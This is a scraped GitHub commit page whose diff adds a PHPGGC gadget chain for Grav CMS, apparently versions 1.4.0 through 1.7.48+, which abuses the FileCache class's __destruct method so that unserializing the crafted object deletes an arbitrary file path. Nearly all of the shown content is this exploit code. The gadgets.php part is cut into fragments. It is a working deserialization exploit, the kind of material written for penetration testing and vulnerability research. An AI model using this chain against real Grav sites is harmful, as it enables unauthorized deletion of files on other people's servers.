We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents c0a36de + 9e65714 commit fe1676aCopy full SHA for fe1676a
gadgetchains/Grav/FD/1/chain.php
@@ -0,0 +1,16 @@
1
+<?php
2
+
3
+namespace GadgetChain\Grav;
4
5
+class FD1 extends \PHPGGC\GadgetChain\FileDelete
6
+{
7
+ public static $version = '1.4.0 <= 1.7.48+';
8
+ public static $vector = '__destruct';
9
+ public static $author = 'mcdruid';
10
+ public static $information = 'https://github.com/getgrav/grav/pull/3874';
11
12
+ public function generate(array $parameters)
13
+ {
14
+ return new \Grav\Framework\Cache\Adapter\FileCache($parameters['remote_path']);
15
+ }
16
+}
gadgetchains/Grav/FD/1/gadgets.php
@@ -0,0 +1,13 @@
+namespace Grav\Framework\Cache\Adapter {
+ class FileCache
+ private $tmp;
+ public function __construct($tmp)
+ $this->tmp = $tmp;
0 commit comments